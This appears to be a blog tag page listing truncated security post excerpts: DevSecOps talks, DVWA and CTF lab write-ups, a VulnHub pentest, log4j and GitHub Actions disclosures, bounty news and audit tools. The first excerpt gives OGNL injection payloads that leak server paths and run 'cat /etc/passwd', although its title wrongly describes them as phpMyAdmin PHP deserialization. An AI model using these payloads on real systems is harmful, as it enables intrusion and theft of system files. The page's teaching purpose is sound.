Tag: Security vulnerabilities
-
phpMyAdmin scripts/setup. Reproducing the PHP deserialization vulnerability
First enter %{1+1} in the password field; it resolves to 2, which indicates that the vulnerability exists. Enter %{"tomcatbindir{" + @java.lang [email protected]("user.dir") + "}"} to get the Tomcat execution path. Get the web path: %{ #[email protected]@getRequest(), #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(), #response.println(#req.getRealPath('/')), #response.flush(), #response.close() } Execute cat /etc/passwd: %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), […]
-
DevSecOps: a model for building secure software happily
The article was first published in: Firewire Zone Cloud Security Community. Author: Ma Jinghe. How to use DevSecOps, which sounds very long and difficult to practice, to help you build secure software happily. My name is Brother Ma. At present, I am working as a DevOps technical evangelist at JiHu GitLab, sharing my experience with […]
-
DVWA file inclusion vulnerability
File inclusion: when the server turns on the allow_url_include option, feature functions such as include(), require(), include_once() and require_once() can dynamically include files via a URL. If the source of the file is not checked, this leads to arbitrary file reading […]
-
BUUCTF hardening question ezsql
Problem reproduction. I did this problem three months ago, but I didn’t get the flag at that time. After other big guys did it, I hurried to learn and record a wave. The conditions and requirements of the topic are very clear: the web service has loopholes and needs to be hardened. If the hardening […]
-
Penetration test: Jangow 01 1.0.1 (entry level)
Penetration test Jangow 01 1.0.1 (I). 1. Environment setup. 1. Target: IP: 192.168.0.9; target download: https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova. 2. Attacker: IP: 192.168.0.11. 3. How to set up: right-click the downloaded file to open it directly and select VirtualBox (be sure to use VirtualBox). After opening it with VirtualBox, the target IP will be displayed. 2. Information gathering. 1. Nmap scan of open ports: nmap […]
-
Latest version: Apache Pulsar's response to the log4j vulnerability
Author: Matteo Merli, StreamNative CTO and chair of the Apache Pulsar PMC; Addison Higham, engineering lead at StreamNative and Apache Pulsar committer. This article is translated from the StreamNative English blog. The original link is: https://streamnative.io/blog/… For more details, please refer to the official account of StreamNative. This article was updated on Tuesday, adding details on how the latest log4j […]
-
GitHub Actions has a serious security vulnerability, and Google Project Zero discloses the details
For developers, creating a project on GitHub does not mean that the project is really finished; a lot of deployment and testing work still has to be done manually. GitHub Actions simplifies this step by automatically testing the project code, and many people now use it for continuous integration […]
-
After discovering vulnerabilities in network products, upstream developers shall be notified immediately and downstream users shall be notified in a timely manner
[Regulations on the Management of Network Product Security Vulnerabilities, Article 7] Network product providers shall perform the following network product security vulnerability management obligations, ensure that their product security vulnerabilities are repaired in a timely manner and disclosed reasonably, and guide and support product users in taking preventive measures: (1) After discovering or learning that there are […]
-
Apple has officially launched a new vulnerability submission reward program, with a bounty of up to $1.5 million
Recently, Apple, the international mobile phone manufacturer, officially launched its latest vulnerability submission reward program for researchers in all security fields. Apple raised the bounty ceiling from $200,000 to $1.5 million. The specific bounty will be determined according to the complexity and severity of the exploit chain. Ivan Krstić, head of security engineering and […]
-
Problems related to CDH5 installation
CDH5 related: install the manager: wget http://archive.cloudera.com/cm5/installer/latest/cloudera-manager-installer.bin; chmod +x cloudera-manager-installer.bin; ./cloudera-manager-installer.bin. Modify environment variables: [[email protected] ~]# vim /etc/sysconfig/network; [[email protected] ~]# vim /etc/hosts; [[email protected] ~]# vim /etc/sysconfig/network; [[email protected] ~]# hostname cdh5datanode1; cat /proc/version. Mirror source: cd /Users/timger/qiniusharedir/cdh5; wget -U "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)" -r -p -k -nc -o down.log http://archive-primary.cloudera.com/cdh5/parcels/latest/; wget -U "Mozilla/4.0 […]
-
Automated security audit tool for Linux servers
Lynis is a security audit tool for UNIX, Linux and similar operating systems; it can discover malware and security vulnerabilities on Linux-based systems. Lynis is a free and open source server audit tool. Once the audit is complete, we can review the results, warnings and suggestions, and then implement our security policy based on them. It […]
-
Zhou Jihai: practice from DevOps to DevSecOps
On September 25 and 26, 2020, the GOPS Global Operations and Maintenance Conference (Shenzhen station) was successfully held. At this conference, top experts from Tencent, Alibaba, JD.com and Ping An shared advanced technical ideas and best practices from the industry with Internet and traditional enterprises, as well as with the majority of operations and maintenance […]